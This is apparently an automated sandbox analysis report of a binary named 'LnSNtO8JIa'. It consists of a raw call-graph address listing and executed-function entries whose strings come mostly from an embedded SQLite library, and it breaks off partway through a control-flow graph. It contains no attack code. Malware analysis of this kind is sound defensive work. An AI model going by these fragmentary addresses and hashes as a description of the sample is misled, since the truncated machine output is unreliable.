104132->104133 104133->104134 104134->104126 104143 6c48ae30 104134->104143 104135 6c48ae30 23 API calls 104136 6c447528 104135->104136 104136->104120 104151 6c4de020 23 API calls _mbstowcs_s 104137->104151 104139 6c4474f3 104139->104120 104140->104135 104140->104136 104141->104113 104142->104121 104146 6c48ae52 _mbstowcs_s 104143->104146 104144 6c4e16b0 _mbstowcs_s 23 API calls 104147 6c48afe3 ___swprintf_l 104144->104147 104145 6c48af15 _mbstowcs_s 104145->104131 104146->104144 104146->104145 104147->104145 104153 6c4dc190 23 API calls _mbstowcs_s 104147->104153 104149 6c48b035 104149->104145 104154 6c4e1980 23 API calls ___swprintf_l 104149->104154 104151->104139 104152->104126 104153->104149 104154->104145 104155 6c446fa0 104156 6c4dcc30 _mbstowcs_s 23 API calls 104155->104156 104157 6c446fb0 104156->104157 104158 6c447053 104157->104158 104160 6c446fcf 104157->104160 104170 6c4dedf0 23 API calls ___swprintf_l 104158->104170 104162 6c48ae30 23 API calls 104160->104162 104161 6c44706e 104163 6c446fee 104162->104163 104164 6c447013 SI1c7a7970970b9619 104163->104164 104165 6c44700c 104163->104165 104166 6c447020 104164->104166 104167 6c44702a 104164->104167 104168 6c447230 23 API calls 104167->104168 104169 6c44704b 104168->104169 104170->104161 103106 6c46ef00 103107 6c46ef53 103106->103107 103108 6c46ef11 103106->103108 103108->103107 103115 6c46f010 103108->103115 103112 6c46ef36 103112->103107 103122 6c4a85e0 103112->103122 103116 6c46f03f 103115->103116 103117 6c46f029 103115->103117 103119 6c4a85e0 27 API calls 103116->103119 103118 6c4a85e0 27 API calls 103117->103118 103118->103116 103120 6c46ef1c 103119->103120 103120->103107 103121 6c4a5cd0 27 API calls 103120->103121 103121->103112 103124 6c4a85ea 103122->103124 103125 6c46ef86 103122->103125 103124->103125 103128 6c46f070 103124->103128 103168 6c4a86e0 27 API calls 103124->103168 103169 6c4a8640 27 API calls 103124->103169 103129 6c46f186 103128->103129 103131 6c46f0a8 103128->103131 103129->103124 103130 6c46f0ac 103130->103124 103131->103130 103159 6c46f0f7 103131->103159 103218 6c4e16b0 103131->103218 103133 6c46f305 103133->103129 103229 6c476ca0 23 API calls 103133->103229 103138 6c46f4a4 103231 6c4a2ef0 23 API calls ___swprintf_l 103138->103231 103139 6c46fbe2 103139->103124 103142 6c46f3ec 103230 6c4ddfc0 23 API calls 2 library calls 103142->103230 103143 6c46f4ad 103143->103139 103239 6c4ddfc0 23 API calls 2 library calls 103143->103239 103146 6c46f3fc 103146->103124 103149 6c46fbd3 103149->103124 103150 6c46fb81 103152 6c46fba1 103150->103152 103153 6c46fb8d 103150->103153 103151 6c4a3430 23 API calls 103167 6c46f32b ___swprintf_l ___scrt_fastfail 103151->103167 103238 6c4ddfc0 23 API calls 2 library calls 103152->103238 103237 6c4ddfc0 23 API calls 2 library calls 103153->103237 103156 6c46fb99 103156->103124 103157 6c4a85e0 27 API calls 103157->103159 103159->103129 103159->103133 103159->103142 103159->103157 103160 6c4ddfc0 23 API calls 103159->103160 103170 6c46fd60 103159->103170 103214 6c4936b0 103159->103214 103224 6c46fc00 27 API calls 3 library calls 103159->103224 103225 6c4701f0 23 API calls 103159->103225 103226 6c48f790 27 API calls 103159->103226 103227 6c4a34a0 27 API calls ___swprintf_l 103159->103227 103228 6c4704a0 23 API calls 103159->103228 103160->103159 103161 6c4a33a0 23 API calls 103161->103167 103162 6c4a4980 23 API calls 103162->103167 103163 6c4e1510 23 API calls ___swprintf_l 103163->103167 103165 6c4df0b0 23 API calls 103165->103167 103167->103129 103167->103138 103167->103143 103167->103150 103167->103151 103167->103161 103167->103162 103167->103163 103167->103165 103232 6c4e1a20 103167->103232 103236 6c4e1330 23 API calls ___swprintf_l 103167->103236 103168->103124 103169->103124 103171 6c4700ed 103170->103171 103172 6c46fd7f 103170->103172 103171->103159 103172->103171 103173 6c46fde3 103172->103173 103174 6c46fdcb 103172->103174 103241 6c4701f0 23 API calls 103173->103241 103240 6c4ddfc0 23 API calls 2 library calls 103174->103240 103177 6c46fdd4 103177->103159 103178 6c46fdec 103178->103177 103179 6c4e16b0 _mbstowcs_s 23 API calls 103178->103179 103180 6c46fdfb 103179->103180 103180->103177 103181 6c46fe4b 103180->103181 103183 6c4e16b0 _mbstowcs_s 23 API calls 103180->103183 103243 6c4e1330 23 API calls ___swprintf_l 103181->103243 103185 6c46fe1f 103183->103185 103184 6c46fe71 103244 6c4a34a0 27 API calls ___swprintf_l 103184->103244 103187 6c46feda 103185->103187 103242 6c477f30 23 API calls 2 library calls 103185->103242 103246 6c4e1980 23 API calls ___swprintf_l 103187->103246 103188 6c46fe9c 103188->103177 103193 6c46febd 103188->103193 103205 6c46fef0 103188->103205 103191 6c46fee4 103191->103159 103192 6c46fe40 103192->103181 103192->103187 103245 6c4ddfc0 23 API calls 2 library calls 103193->103245 103195 6c46fecb 103195->103159 103196 6c46ff21 103197 6c47003d 103196->103197 103198 6c47000d 103196->103198 103199 6c4a85e0 27 API calls 103197->103199 103200 6c4a85e0 27 API calls 103198->103200 103203 6c47001d 103199->103203 103200->103203 103201 6c470028 103201->103159 103202 6c470093 103249 6c4744a0 27 API calls 3 library calls 103202->103249 103203->103201 103203->103202 103208 6c47007f 103203->103208 103204 6c46ffc4 103247 6c4ddfc0 23 API calls 2 library calls 103204->103247 103205->103196 103205->103204 103248 6c4ddfc0 23 API calls 2 library calls 103208->103248 103209 6c4700a7 103210 6c4700d1 103209->103210 103213 6c4a85e0 27 API calls 103209->103213 103210->103159 103211 6c46ffd6 103211->103159 103213->103210 103215 6c4936c4 103214->103215 103250 6c493700 103215->103250 103217 6c4936f7 103217->103159 103219 6c4e16cc 103218->103219 103220 6c4e16bc 103218->103220 103223 6c4e16c5 ___scrt_fastfail 103219->103223 103275 6c4e1bb0 103219->103275 103266 6c4e1510 103220->103266 103223->103159 103224->103159 103225->103159 103226->103159 103227->103159 103228->103159 103229->103167 103230->103146 103231->103143 103233 6c4e1a2b 103232->103233 103234 6c4e1a61 103232->103234 103233->103234 103300 6c4dbd60 103233->103300 103234->103167 103236->103167 103237->103156 103238->103143 103239->103149 103240->103177 103241->103178 103242->103192 103243->103184 103244->103188 103245->103195 103246->103191 103247->103211 103248->103201 103249->103209 103259 6c49371a _mbstowcs_s 103250->103259 103251 6c4937bd 103252 6c49382d 103251->103252 103253 6c493810 103251->103253 103260 6c493731 103251->103260 103265 6c4ddfc0 23 API calls 2 library calls 103252->103265 103264 6c4ddfc0 23 API calls 2 library calls 103253->103264 103255 6c4937ac 103255->103251 103263 6c462b90 23 API calls 3 library calls 103255->103263 103257 6c49381d 103257->103217 103259->103251 103259->103255 103259->103260 103262 6c478b90 23 API calls 103259->103262 103260->103217 103262->103255 103263->103251 103264->103257 103265->103260 103267 6c4e154e 103266->103267 103268 6c4e1529 103266->103268 103269 6c4e1558 103267->103269 103280 6c4e1640 103267->103280 103268->103267 103270 6c4e1538 103268->103270 103269->103223 103271 6c4e1640 ___swprintf_l 23 API calls 103270->103271 103272 6c4e1547 103271->103272 103272->103223 103276 6c4e1c06 103275->103276 103277 6c4e1bbb 103275->103277 103276->103223 103277->103276 103284 6c4e1c20 103277->103284 103279 6c4e1bec 103279->103223 103281 6c4e1653 103280->103281 103283 6c4e15eb 103280->103283 103282 6c4e1bb0 ___swprintf_l 23 API calls 103281->103282 103282->103283 103283->103223 103286 6c4e1c35 103284->103286 103285 6c4e1c8e 103291 6c4e1cb5 103285->103291 103293 6c4dbda0 RtlAllocateHeap 103285->103293 103286->103285 103297 6c4e1d60 23 API calls ___swprintf_l 103286->103297 103287 6c4e1cf3 103287->103279 103291->103279 103294 6c4dbdbd 103293->103294 103295 6c4dbdd4 103293->103295 103299 6c4dedf0 23 API calls ___swprintf_l 103294->103299 103295->103287 103298 6c4e1d60 23 API calls ___swprintf_l 103295->103298 103297->103285 103298->103287 103299->103295 103301 6c4dbd95 103300->103301 103302 6c4dbd72 RtlFreeHeap 103300->103302 103301->103234 103302->103301 103303 6c4dbd80 103302->103303 103305 6c4dedf0 23 API calls ___swprintf_l 103303->103305 103305->103301 104171 6c4bd630 104172 6c4bd64a 104171->104172 104177 6c4bd677 104171->104177 104173 6c4bd665 104172->104173 104205 6c4be1f0 23 API calls _mbstowcs_s 104172->104205 104175 6c4bd7e5 104179 6c4bd7aa ___swprintf_l 104175->104179 104206 6c4be1b0 23 API calls 2 library calls 104175->104206 104177->104175 104177->104177 104178 6c4bd72d 104177->104178 104178->104179 104180 6c4bd75e 104178->104180 104184 6c4be4f0 104178->104184 104183 6c4bd65c 104179->104183 104207 6c4de3d0 23 API calls _mbstowcs_s 104179->104207 104185 6c4be50e 104184->104185 104197 6c4be58a 104184->104197 104186 6c4be57b 104185->104186 104189 6c4be51a 104185->104189 104186->104197 104211 6c4e1980 23 API calls ___swprintf_l 104186->104211 104187 6c4be59a 104190 6c4e1510 ___swprintf_l 23 API calls 104187->104190 104188 6c4be5a6 104191 6c4e1bb0 ___swprintf_l 23 API calls 104188->104191 104202 6c4be547 104188->104202 104192 6c4be526 104189->104192 104193 6c4be555 104189->104193 104190->104202 104191->104202 104208 6c4e1480 23 API calls ___swprintf_l 104192->104208 104210 6c4e17b0 23 API calls ___swprintf_l 104193->104210 104197->104187 104197->104188 104198 6c4be55c 104200 6c4e1a20 ___swprintf_l 23 API calls 104198->104200 104198->104202 104199 6c4be52f 104199->104202 104209 6c4e1980 23 API calls ___swprintf_l 104199->104209 104200->104202 104204 6c4be5d6 ___swprintf_l 104202->104204 104212 6c4be1f0 23 API calls _mbstowcs_s 104202->104212 104204->104179 104205->104183 104206->104179 104207->104183 104208->104199 104209->104202 104210->104198 104211->104197 104212->104204 104213 6c4b57b0 104214 6c4b57d6 104213->104214 104215 6c4b57c5 104213->104215 104217 6c4b57e6 104214->104217 104238 6c4dedf0 23 API calls ___swprintf_l 104214->104238 104237 6c4dedf0 23 API calls ___swprintf_l 104215->104237 104219 6c4b57d1 104217->104219 104220 6c4b5820 104217->104220 104239 6c4dedf0 23 API calls ___swprintf_l 104219->104239 104240 6c4b5910 104220->104240 104222 6c4b5811 104224 6c4b5890 104226 6c4b5892 104264 6c4b6550 23 API calls 104226->104264 104229 6c4b58a1 104231 6c4b58b7 104229->104231 104265 6c4e1980 23 API calls ___swprintf_l 104229->104265 104230 6c4b5844 104230->104224 104230->104226 104232 6c4b5910 30 API calls 104230->104232 104262 6c477990 30 API calls _mbstowcs_s 104230->104262 104263 6c4b6880 30 API calls _mbstowcs_s 104230->104263 104231->104224 104266 6c4e1330 23 API calls ___swprintf_l 104231->104266 104232->104230 104235 6c4b58c6 104267 6c4e1120 23 API calls _mbstowcs_s 104235->104267 104237->104219 104238->104217 104239->104222 104241 6c4b591e 104240->104241 104242 6c4b5924 104240->104242 104278 6c4b6880 30 API calls _mbstowcs_s 104241->104278 104243 6c4b592f 104242->104243 104245 6c4b5953 104242->104245 104253 6c4b597e 104242->104253 104254 6c4b59ba 104242->104254 104243->104230 104248 6c4b5a73 104245->104248 104279 6c4b8dc0 23 API calls _mbstowcs_s 104245->104279 104246 6c4b59fa 104268 6c4acb60 104246->104268 104247 6c4b59f3 104281 6c4ba250 23 API calls _mbstowcs_s 104247->104281 104248->104230 104252 6c4b5973 104252->104230 104253->104254 104280 6c4e2890 21 API calls ___swprintf_l 104253->104280 104254->104246 104254->104247 104255 6c4b59f8 104256 6c4b5a2f 104255->104256 104260 6c4b5a34 104255->104260 104282 6c4b6a20 21 API calls ___swprintf_l 104255->104282 104256->104260 104283 6c4b8dc0 23 API calls _mbstowcs_s 104256->104283 104260->104248 104284 6c4e1120 23 API calls _mbstowcs_s 104260->104284 104262->104230 104263->104230 104264->104229 104265->104231 104266->104235 104267->104224 104273 6c4acbba 104268->104273 104269 6c4acc2b 104270 6c4dedf0 23 API calls ___swprintf_l 104270->104273 104273->104269 104273->104270 104275 6c4b2bf7 104273->104275 104285 6c4bc360 23 API calls 2 library calls 104273->104285 104286 6c4b8e90 30 API calls ___swprintf_l 104273->104286 104287 6c493150 23 API calls ___swprintf_l 104273->104287 104288 6c3d11bc 5 API calls ___raise_securityfailure 104275->104288 104277 6c4b2c1f 104277->104255 104278->104242 104279->104252 104280->104254 104281->104255 104282->104256 104283->104260 104284->104248 104285->104273 104286->104273 104287->104273 104288->104277 103626 6c4c8310 103627 6c4c8330 103626->103627 103628 6c4c8386 103627->103628 103632 6c4c8507 103627->103632 103634 6c4c8730 103627->103634 103650 6c4c8650 23 API calls ___scrt_fastfail 103627->103650 103651 6c4d3bd0 27 API calls 103627->103651 103632->103628 103652 6c4cfce0 23 API calls 3 library calls 103632->103652 103653 6c4d0f00 103634->103653 103636 6c4c87c2 103636->103627 103637 6c4c8904 103637->103636 103694 6c4d3bd0 27 API calls 103637->103694 103638 6c4c8742 103638->103636 103638->103637 103641 6c4c8825 103638->103641 103677 6c4cf390 103638->103677 103641->103637 103642 6c4c8837 103641->103642 103643 6c4c88ba 103641->103643 103644 6c4c88e6 103641->103644 103642->103627 103681 6c4c8f30 23 API calls ___swprintf_l 103643->103681 103644->103637 103693 6c445110 23 API calls ___swprintf_l 103644->103693 103646 6c4c88cf 103682 6c4d23c0 103646->103682 103649 6c4c88dc 103649->103627 103650->103627 103651->103627 103652->103628 103654 6c4d10f3 103653->103654 103663 6c4d0f26 103653->103663 103672 6c4d105f 103654->103672 103695 6c4d2ba0 103654->103695 103656 6c4d1127 103706 6c4d3f80 23 API calls ___swprintf_l 103656->103706 103657 6c4d1141 103708 6c3d11bc 5 API calls ___raise_securityfailure 103657->103708 103660 6c4d112e 103707 6c3d11bc 5 API calls ___raise_securityfailure 103660->103707 103661 6c4d1158 103661->103638 103663->103654 103663->103656 103664 6c4d0f75 103663->103664 103673 6c4d1041 103663->103673 103674 6c4d0f94 103663->103674 103701 6c4d3f80 23 API calls ___swprintf_l 103664->103701 103665 6c4d113d 103665->103638 103667 6c4d0f81 103702 6c3d11bc 5 API calls ___raise_securityfailure 103667->103702 103669 6c4d0f90 103669->103638 103671 6c4d1013 103671->103672 103671->103673 103704 6c4d2f60 27 API calls 2 library calls 103671->103704 103672->103656 103672->103657 103673->103672 103705 6c4d2a80 23 API calls 103673->103705 103674->103656 103674->103671 103703 6c4450b0 23 API calls ___swprintf_l 103674->103703 103678 6c4cf39c 103677->103678 103680 6c4cf3df 103677->103680 103678->103680 103740 6c4cf410 103678->103740 103680->103641 103681->103646 103683 6c4d23de 103682->103683 103684 6c4d2448 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 103683->103684 103685 6c4d6620 23 API calls 103683->103685 103686 6c4d243c 103683->103686 103684->103649 103687 6c4d2432 103685->103687 103688 6c4d6560 ___swprintf_l 23 API calls 103686->103688 103687->103686 103751 6c4d7350 103687->103751 103688->103684 103690 6c4d24b6 103690->103686 103691 6c4d24bc 103690->103691 103692 6c4d6560 ___swprintf_l 23 API calls 103691->103692 103692->103684 103693->103637 103694->103636 103696 6c4d2bc0 103695->103696 103709 6c4ccab0 103696->103709 103699 6c4d6dc0 23 API calls 103700 6c4d2c0b 103699->103700 103700->103672 103701->103667 103702->103669 103703->103671 103704->103673 103705->103654 103706->103660 103707->103665 103708->103661 103712 6c4ccac2 103709->103712 103713 6c4ccbf4 103712->103713 103714 6c4cd450 103712->103714 103728 6c4cd100 24 API calls 2 library calls 103712->103728 103713->103699 103713->103700 103715 6c4cd466 103714->103715 103717 6c4cd472 103715->103717 103729 6c4cf0f0 103715->103729 103718 6c4cd5db 103717->103718 103720 6c4cd4b4 103717->103720 103735 6c4cd620 5 API calls _ValidateLocalCookies 103717->103735 103718->103712 103721 6c4cf0f0 23 API calls 103720->103721 103723 6c4cd553 103720->103723 103726 6c4cd4d1 103720->103726 103721->103723 103723->103726 103736 6c4cd620 5 API calls _ValidateLocalCookies 103723->103736 103725 6c4cd577 103725->103726 103737 6c4ce720 24 API calls 4 library calls 103725->103737 103726->103718 103738 6c4dedf0 23 API calls ___swprintf_l 103726->103738 103728->103712 103730 6c4cf105 103729->103730 103732 6c4cf117 ___scrt_fastfail 103729->103732 103739 6c4e17b0 23 API calls ___swprintf_l 103730->103739 103733 6c4e1c20 _mbstowcs_s 23 API calls 103732->103733 103734 6c4cf120 ___scrt_fastfail 103732->103734 103733->103734 103734->103717 103735->103720 103736->103725 103737->103726 103738->103718 103739->103732 103741 6c4cf41b 103740->103741 103743 6c4cf44e 103741->103743 103744 6c4ce540 103741->103744 103743->103680 103745 6c4ce5e8 103744->103745 103746 6c4ce56a 103744->103746 103745->103743 103747 6c4e1bb0 ___swprintf_l 23 API calls 103746->103747 103749 6c4ce572 ___scrt_fastfail 103747->103749 103748 6c4e1a20 ___swprintf_l 23 API calls 103750 6c4ce64d 103748->103750 103749->103745 103749->103748 103750->103743 103752 6c4d735d 103751->103752 103753 6c4d7370 103751->103753 103755 6c4d5e50 103752->103755 103753->103690 103756 6c4d5e6d 103755->103756 103759 6c4d5e74 ___scrt_fastfail 103755->103759 103757 6c4e1bb0 ___swprintf_l 23 API calls 103756->103757 103757->103759 103758 6c4d5f54 103758->103753 103759->103758 103760 6c4d6260 23 API calls 103759->103760 103761 6c4d5f06 103760->103761 103761->103758 103764 6c4d58c0 23 API calls ___swprintf_l 103761->103764 103763 6c4d5f48 103763->103753 103764->103763 103306 6c4d5ac0 103307 6c4d5acf 103306->103307 103308 6c4d5b01 103306->103308 103313 6c4d5b70 103307->103313 103309 6c4d5b70 23 API calls 103308->103309 103310 6c4d5b0e 103309->103310 103312 6c4d5ae4 103314 6c4d5b87 103313->103314 103315 6c4d5ba8 103314->103315 103318 6c4d5be0 103314->103318 103315->103312 103317 6c4d5ba2 103317->103312 103320 6c4d5c00 103318->103320 103319 6c4d5c33 103319->103317 103320->103319 103324 6c4d5c48 103320->103324 103334 6c4d6260 103320->103334 103322 6c4d5ccd 103327 6c4d6460 103322->103327 103324->103322 103325 6c4d5cdd 103324->103325 103338 6c4d6430 23 API calls ___swprintf_l 103324->103338 103325->103317 103328 6c4d6478 103327->103328 103329 6c4d6504 103327->103329 103332 6c4d6483 103328->103332 103339 6c4d6740 23 API calls ___swprintf_l 103328->103339 103329->103325 103332->103329 103340 6c4d6620 103332->103340 103335 6c4d628d 103334->103335 103336 6c4e1bb0 ___swprintf_l 23 API calls 103335->103336 103337 6c4d62be ___scrt_fastfail 103335->103337 103336->103337 103337->103324 103338->103322 103339->103332 103341 6c4d6631 103340->103341 103342 6c4e1bb0 ___swprintf_l 23 API calls 103341->103342 103343 6c4d64b0 103341->103343 103342->103343 103343->103325 103765 6c4d2d50 103766 6c4d2d6f 103765->103766 103768 6c4d2da7 103766->103768 103769 6c4d2e20 103766->103769 103770 6c4d2e4b 103769->103770 103772 6c4d2e58 103769->103772 103773 6c4cc8d0 23 API calls ___swprintf_l 103770->103773 103772->103768 103773->103772

                                                                                      Executed Functions

                                                                                      Function 6C46F070 Relevance: 18.4, APIs: 1, Strings: 9, Instructions: 935COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s.%s$%s.%s.%s$@$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                      • API String ID: 0-3093030561
                                                                                      • Opcode ID: d3e13d1d15f3507966c839ebeda713e24157e5aecd629385e2d3d101e0cf6b1f
                                                                                      • Instruction ID: 47f9adc1cd73f5673e277af2b96e72b655db41492e0faffc2df725e2e238f968
                                                                                      • Opcode Fuzzy Hash: d3e13d1d15f3507966c839ebeda713e24157e5aecd629385e2d3d101e0cf6b1f
                                                                                      • Instruction Fuzzy Hash: FF82CE7160A3419FE700CF2AC480F5ABBF1BF89318F144A5DE8958BB59E731E846CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C9010 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 584COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C4C91DC
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C4C9266
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C4C926F
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C4C9374
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: :memory:
                                                                                      • API String ID: 223094752-2920599690
                                                                                      • Opcode ID: a89faab2252d959f11fced05896ff87a52303db0ef0cfe6e439e5dbbcae4229e
                                                                                      • Instruction ID: 4990803790c67842a3dd3cf25e8c6f43cee48f77b6389ca07e86152c4cafb685
                                                                                      • Opcode Fuzzy Hash: a89faab2252d959f11fced05896ff87a52303db0ef0cfe6e439e5dbbcae4229e
                                                                                      • Instruction Fuzzy Hash: B522F478B01204AFEB14CF25C885FAAB7B1AF1530DF24416CD85997BA2DB33D945CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4D87A0 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNEL32(6C5142A8,?,6C4E27AC,?,?,6C44931E), ref: 6C4D87C1
                                                                                        • Part of subcall function 6C4E25F0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00005F42,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,00000000,?,6C4D87D3,6C511960,00000001,?,6C4E27AC,?,?,6C44931E), ref: 6C4E261F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 905196625-0
                                                                                      • Opcode ID: 98e28f767a4ec790e612622c62dcae7fdbfd14c4d8420e949635c82e1612b971
                                                                                      • Instruction ID: 702acea319cee69651755a658457c207db1f2cb77a5c9e83be296cbfbae8fe07
                                                                                      • Opcode Fuzzy Hash: 98e28f767a4ec790e612622c62dcae7fdbfd14c4d8420e949635c82e1612b971
                                                                                      • Instruction Fuzzy Hash: 5DF090B1B983422AFB20DB704D8EF4A2660675671EF276649F41424D80EFE0A1D49399
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0108D530 Relevance: .3, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3363455380.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1080000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f4d75c81961636ac25846c3fee712470d048feba68de69f9650cdc1ae5e627a
                                                                                      • Instruction ID: 6974b90fd25b7bce85024eca8001126f0f8ee98c733a887b86a1986226f07263
                                                                                      • Opcode Fuzzy Hash: 6f4d75c81961636ac25846c3fee712470d048feba68de69f9650cdc1ae5e627a
                                                                                      • Instruction Fuzzy Hash: 74A17035714602CBEB18FB79E954B6A7BF6FF88340F118669D5868B294EF34D802CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01085D94 Relevance: .1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3363455380.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1080000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7efba92f3cf3f57634d9462ccf47fc65de479da5ae38cdaecfe369352a23f5a4
                                                                                      • Instruction ID: 0278fe79907a75df7cb036cddcaa3cb31a3c2d910152a1cd1064a0f820dddde4
                                                                                      • Opcode Fuzzy Hash: 7efba92f3cf3f57634d9462ccf47fc65de479da5ae38cdaecfe369352a23f5a4
                                                                                      • Instruction Fuzzy Hash: 32514B70A0421A8BDB64EB64C844BEEB7B2BF84304F508199E5C9A7385DF709D86CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C445590 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 378COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 6c445590-6c4455b8 1 6c4455e4-6c4455f1 call 6c4491f0 0->1 2 6c4455ba-6c4455e3 call 6c4dedf0 0->2 7 6c445ab7-6c445abd 1->7 8 6c4455f7-6c445600 1->8 9 6c445606-6c44560c 8->9 10 6c445602-6c445604 8->10 12 6c445612-6c44561d 9->12 13 6c44560e-6c445610 9->13 11 6c445626-6c44562c 10->11 15 6c445636-6c44563d 11->15 16 6c44562e-6c445634 11->16 12->11 14 6c44561f 12->14 13->11 14->11 17 6c445645-6c445655 15->17 18 6c44563f 15->18 16->17 19 6c445694-6c44569f 17->19 20 6c445657-6c44565e 17->20 18->17 27 6c4456a1 19->27 21 6c445660-6c445667 20->21 22 6c44566a-6c44567f call 6c4e1c20 20->22 21->22 28 6c445681-6c44568c 22->28 29 6c44568e-6c445692 22->29 30 6c4456a4-6c4456a6 27->30 28->27 29->30 31 6c445a47-6c445a55 SI45d842f2d2322061 30->31 32 6c4456ac-6c4456be call 6c3d2790 30->32 34 6c445a86-6c445a88 31->34 35 6c445a57-6c445a6a call 6c448210 31->35 32->31 41 6c4456c4-6c4456c6 32->41 37 6c445a8e-6c445a96 34->37 38 6c445a8a 34->38 42 6c445aa8-6c445ab4 call 6c444630 35->42 37->42 43 6c445a98-6c445aa5 call 6c445ac0 37->43 38->37 45 6c4456f7-6c4456fc 41->45 46 6c4456c8-6c4456cf 41->46 42->7 43->42 53 6c4456fe-6c445705 45->53 54 6c445708-6c445866 call 6c446330 * 5 45->54 49 6c4456d5-6c4456dd 46->49 50 6c4456d1-6c4456d3 46->50 56 6c4456e0-6c4456e5 49->56 50->56 53->54 71 6c445a36-6c445a3b 54->71 72 6c44586c-6c44587d 54->72 56->45 59 6c4456e7-6c4456f2 call 6c4e1a20 56->59 59->31 71->31 73 6c445a3d-6c445a44 71->73 74 6c44587f-6c445889 call 6c4450e0 72->74 75 6c44588b-6c4458a9 call 6c445cb0 72->75 73->31 81 6c4458ac-6c4458b0 74->81 75->81 82 6c4458e7-6c445908 call 6c4c9010 81->82 83 6c4458b2-6c4458b5 81->83 92 6c445938-6c44595a call 6c4cba10 call 6c48aa90 82->92 93 6c44590a-6c44591c 82->93 84 6c4458b7-6c4458bd call 6c4e11d0 83->84 85 6c4458c0-6c4458e2 call 6c4de020 call 6c4e1a20 83->85 84->85 85->71 104 6c44596c-6c445976 92->104 105 6c44595c-6c445967 call 6c48b310 92->105 96 6c44591e-6c445924 93->96 97 6c44592a-6c445933 call 6c4de180 93->97 96->71 96->97 97->71 107 6c445983-6c4459bb call 6c48aa90 104->107 108 6c445978-6c44597c 104->108 105->104 107->71 113 6c4459bd-6c4459cb 107->113 108->107 109 6c44597e call 6c4cba30 